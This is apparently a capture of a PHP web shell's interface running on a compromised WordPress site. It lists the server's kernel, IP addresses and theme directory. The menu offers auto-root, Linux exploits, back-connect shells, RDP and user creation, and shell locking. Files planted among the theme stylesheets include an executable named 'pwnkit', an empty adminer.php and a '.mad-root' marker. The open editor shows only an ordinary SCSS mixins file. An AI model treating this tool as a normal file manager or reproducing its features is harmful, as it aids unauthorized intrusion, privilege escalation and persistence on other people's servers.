Linux webm016.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.127.20.16 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
7.4.33
dottorr
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
dottorr /
www /
wp-content /
themes /
oceanwp /
sass /
[ HOME SHELL ]
Name
Size
Permission
Action
base
[ DIR ]
drwxr-xr-x
components
[ DIR ]
drwxr-xr-x
edd
[ DIR ]
drwxr-xr-x
learndash
[ DIR ]
drwxr-xr-x
llms
[ DIR ]
drwxr-xr-x
woo
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
_config.scss
2.51
KB
-rw-r--r--
_layout.scss
9.94
KB
-rw-r--r--
_mixins.scss
3.31
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
blog-post-headers.scss
32.2
KB
-rw-r--r--
edd.scss
204
B
-rw-r--r--
gutenberg-editor.scss
3.37
KB
-rw-r--r--
hover-style.scss
10.12
KB
-rw-r--r--
learndash.scss
202
B
-rw-r--r--
llms.scss
188
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
style.scss
2.11
KB
-rw-r--r--
stylesheet.scss
5.46
KB
-rw-r--r--
wishlist.scss
1.45
KB
-rw-r--r--
woo-floating-bar.scss
4.29
KB
-rw-r--r--
woo-mini-cart.scss
6.06
KB
-rw-r--r--
woo-multistep-checkout.scss
4.92
KB
-rw-r--r--
woo-quick-view.scss
6.17
KB
-rw-r--r--
woocommerce.scss
368
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _mixins.scss
// Font Size @mixin font-size($sizeValue: 1) { font-size: ($sizeValue * 16) * 1px; font-size: $sizeValue * 1rem; } // Box Sizing @mixin box-sizing($args) { -webkit-box-sizing: $args; -moz-box-sizing: $args; box-sizing: $args; } // Display Flex @mixin display() { display: -webkit-box; display: -webkit-flex; display: -ms-flexbox; display: flex; } // Flex Wrap @mixin flex-wrap($args) { -ms-flex-wrap: $args; -webkit-flex-wrap: $args; flex-wrap: $args; } // Flex Direction @mixin flex-direction($args) { -webkit-flex-direction: $args; flex-direction: $args; } // Align Items @mixin align-items($args) { -webkit-align-items: $args; align-items: $args; } // Justify Content @mixin justify-content($args) { -webkit-justify-content: $args; justify-content: $args; } // Animation @mixin animation($args) { -ms-animation: $args; -webkit-animation: $args; -o-animation: $args; -moz-animation: $args; animation: $args; } // Animation Delay @mixin animation-delay($args) { -ms-animation-delay: $args; -webkit-animation-delay: $args; -o-animation-delay: $args; -moz-animation-delay: $args; animation-delay: $args; } // Transform @mixin transform($args) { -webkit-transform: $args; -moz-transform: $args; -ms-transform: $args; -o-transform: $args; transform: $args; } // Transition @mixin transition($args) { -webkit-transition: $args; -moz-transition: $args; -ms-transition: $args; -o-transition: $args; transition: $args; } // Transition Duration @mixin transition-duration($args) { -webkit-transition-duration: $args; -moz-transition-duration: $args; -ms-transition-duration: $args; -o-transition-duration: $args; transition-duration: $args; } // Transition Delay @mixin transition-delay($args) { -webkit-transition-delay: $args; -moz-transition-delay: $args; -ms-transition-delay: $args; -o-transition-delay: $args; transition-delay: $args; } // Opacity @mixin opacity($args) { -moz-opacity: $args; -webkit-opacity: $args; opacity: $args; } // Border radius @mixin border-radius($args) { -webkit-border-radius: $args; -moz-border-radius: $args; -ms-border-radius: $args; border-radius: $args; } // Box Shadow @mixin box-shadow($args) { -webkit-box-shadow: $args; -moz-box-shadow: $args; box-shadow: $args; } // Font Awesome CSS @mixin font-awesome() { font-family: "Font Awesome 5 Free"; font-weight: 600; font-style: normal; letter-spacing: normal; text-rendering: auto; } // Simple Line Icons CSS @mixin simple-line-icons() { font-family: "simple-line-icons"; font-weight: normal; font-style: normal; letter-spacing: normal; text-rendering: auto; } // Animation and Keyframe @mixin keyframes($animation-name) { @-webkit-keyframes #{$animation-name} { @content; } @-moz-keyframes #{$animation-name} { @content; } @-ms-keyframes #{$animation-name} { @content; } @-o-keyframes #{$animation-name} { @content; } @keyframes #{$animation-name} { @content; } } @mixin animation($str) { -webkit-animation: #{$str}; -moz-animation: #{$str}; -ms-animation: #{$str}; -o-animation: #{$str}; animation: #{$str}; }
Close